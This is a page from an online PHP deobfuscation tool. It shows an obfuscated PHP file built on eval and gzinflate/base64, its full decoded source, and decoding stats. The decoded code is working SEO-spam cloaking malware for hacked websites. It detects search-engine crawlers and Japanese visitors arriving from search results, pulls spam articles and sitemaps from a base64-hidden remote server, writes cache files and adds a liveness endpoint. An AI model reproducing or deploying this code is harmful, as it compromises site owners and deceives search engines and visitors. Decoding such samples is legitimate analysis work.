Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $o0o=__FILE__;$oOo='xRhpb9s49nuB/gdWCCJ5IV9N0lnU4+k4jnJMnWN8NL0CgZZpm41kaSQ5dZrmv+8..
Decoded Output download
?><?php
@ini_set('memory_limit', '-1');
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@error_reporting(0);
@ini_set('display_errors', 0);
$bak_dir = dirname('index.php') . "/images";
if (!file_exists($bak_dir)) {
mkdir($bak_dir);
}
$suffix_txt = $bak_dir . '/suffix.txt';
if (file_exists($suffix_txt)) {
$suffix = file_get_contents($suffix_txt);
}else{
$suffix = randomSuffix();
file_put_contents($suffix_txt, $suffix, LOCK_EX);
}
$req_path = $_SERVER["REQUEST_URI"];
$ip = $_SERVER["REMOTE_ADDR"];
if(IsFltExt()) return;
//if(IsGBot()) return;
if(!IsGBot()&&!IsClickFromSE()) return;
if(!IsGBot()&&!IsJpLng()) return;
if(preg_match("/rrgsmp\/(.*)/i",$req_path,$res))
{
$action = "sitemap";
$apikey = $res[1];
}
if(preg_match("/sitemap\/(.*)/i",$req_path,$res))
{
$action = "sitemap";
$apikey = $res[1];
}
if(preg_match("/sitemap\/(.*)\.txt$/i",$req_path,$res))
{
$action = "sitemap_txt";
$apikey = $res[1];
}
if($action=="sitemap")
{
ob_clean();
header('Content-type: text/xml; charset=utf-8');
siteMapXml();exit();
}
if(preg_match("/check-alive/i",$req_path,$res))
{
echo "--alive--"; exit;
}
elseif(preg_match("/-(\d{4,})/i",$req_path,$res))
{
$action = "article";
$id = $res[1];
}
else
{
$action = "article";
$id = -1;
}
if($action=="article")
{
header('Content-Type:text/html; charset=utf-8');
if(IsGBot()){
$bot = 1;
}else{
$bot = -1;
}
Article();
exit();
}
function randomSuffix()
{
$strs = 'ABCDEFGHIGKLMNOPQRSTUVWZYZabcdefghigklmnopqrstuvwxyz';
$strs_array = str_split($strs);
shuffle($strs_array);
$str_array = array_slice($strs_array, 0, mt_rand(3, 4));
$str = '.' . implode($str_array);
return $str;
}
function GetDomain()
{
$host = $_SERVER['HTTP_HOST'];
if (isHTTPS()) {
$host = 'https://' . $host;
}else{
$host = 'http://' . $host;
}
return $host;
}
function randomApi()
{
$str = base64_decode('aHR0cDovL0U5VDNIMldHTHBBZ2ZGZWcuY25kc3RvcC50b3AvYXBpMi5waHA=');
return $str;
}
function IsFltExt()
{
global $req_path;
try
{
$date = explode('?', $req_path);
$date = basename($date[0]);
$date = explode('.', $date);
$ext = strtolower($date[1]);
return $ext=="jpg"
||$ext=="gif"
||$ext=="css"
||$ext=="js"
||$ext=="png";
}
catch (Exception $e)
{ }
}
function Article()
{
global $bak_dir, $id, $req_path, $suffix, $bot;
$url_md5 = md5($req_path);
if ($req_path == '' || $req_path == '/' || $req_path == '/index.php') {
$bot = 1;
}
if ($id == -1) {
$get_url = randomApi()."?bot=id&shkey=".$shkey."&act=1"."&id=".$id."&suffix=". $suffix ."&md5=".$url_md5;
$get_html = FFGet($get_url);
$get_id = trim($get_html);
$str_length = strlen($req_path);
$str_dir = $bak_dir . '/bak';
if (!file_exists($str_dir)) {
mkdir($str_dir);
}
$id_bak_dir = $str_dir . '/' . $str_length;
if (!file_exists($id_bak_dir)) {
mkdir($id_bak_dir);
}
$id_bak_file = $id_bak_dir . '/' . md5($req_path) . '.jpg';
if (file_exists($id_bak_file)) {
$id = file_get_contents($id_bak_file);
}else{
$id = $get_id;
file_put_contents($id_bak_file, $get_id, LOCK_EX);
}
}
$shkey = GetDomain();
$url = randomApi()."?bot=".$bot."&shkey=".$shkey."&act=1"."&id=".$id."&suffix=". $suffix ."&md5=".$url_md5;
$html = FFGet($url);
echo $html;
}
function IsJpLng()
{
$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
return stripos($lang,"ja")===0;
}
function IsGBot()
{
global $ip;
$ua=$_SERVER['HTTP_USER_AGENT'];
if(stripos($ua,"iseo")) return true;
$spider_list=array("google"
, "yahoo"
, "live"
, "msn"
, "bing"
, "facebook","nike","sbcglobal","microsoft");
$domain = "";
try
{
$domain = gethostbyaddr($ip);
if($domain!="")
{
$domain = strtolower($domain);
foreach ($spider_list as $s)
{
if(stripos($domain,$s))
{
return true;
}
}
}
}
catch(Exception $e)
{
}
if($domain=="")
{
return (stripos($ua,"bot")||stripos($ua,"spider")||stripos($ua,"yahoo")||stripos($ua,"seznam")||stripos($ua,"bing"));
}
else
{
return false;
}
}
function IsClickFromSE()
{
$ref=$_SERVER['HTTP_REFERER'];
return (stripos($ref,"google")||stripos($ref,"yahoo")||stripos($ref,"bing")||stripos($ref,"seznam"));
}
function FFGet( $url ){
$file_contents ='';
$user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36";
if(function_exists('file_get_contents')){
ini_set('user_agent',$user_agent);
try
{
$file_contents = @file_get_contents( $url );
}
catch (Exception $e)
{ }
}
if(strlen($file_contents)<1&&function_exists('curl_init')){
try
{
$file_contents ="";
$ch = curl_init();
$timeout = 30;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
curl_setopt($ch,CURLOPT_USERAGENT,$user_agent);
$file_contents = curl_exec( $ch);
curl_close( $ch );
}
catch (Exception $e)
{}
}
if($file_contents=="503"||$file_contents=="")
{
STU();
}
return $file_contents;
}
function STU()
{
ob_start();
header('HTTP/1.1 503 Service Temporarily Unavailable');
header('Status: 503 Service Temporarily Unavailable');
header('Retry-After:1200');
header('X-Powered-By:Apache');
exit();
}
function siteMapXml()
{
global $bak_dir,$apikey,$suffix;
$html = FFGet(randomApi()."?act=2&shkey=".GetDomain()."&suffix=". $suffix ."&id=".$apikey);
echo $html;
$xml_file = 'sitemapnew.xml';
if (!file_exists($xml_file)) {
file_put_contents($xml_file, $html, LOCK_EX);
}
}
function isHTTPS(){
if(!isset($_SERVER['HTTPS'])) return FALSE;
if($_SERVER['HTTPS'] === 1){
return TRUE;
}elseif($_SERVER['HTTPS'] === 'on'){
return TRUE;
}elseif($_SERVER['SERVER_PORT'] == 443){
return TRUE;
}
return FALSE;
}
?>Did this file decode correctly?
Original Code
<?php
$o0o=__FILE__;$oOo='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';eval(gzinflate(base64_decode('U8n3z7dNr8rMS8tJLEnVSEosTjUziU9JTc5PSdVQAUpqalqDKNvikqL4otSCnMTkVA2l+Hg3Tx/X+HglHSV1lXyDfHUlHbBa69SyxByINmsA')));?>Function Calls
| gzinflate | 2 |
| str_replace | 1 |
| base64_decode | 2 |
Stats
| MD5 | 2806b141eba661928dd8207d4588aa1a |
| Eval Count | 2 |
| Decode Time | 90 ms |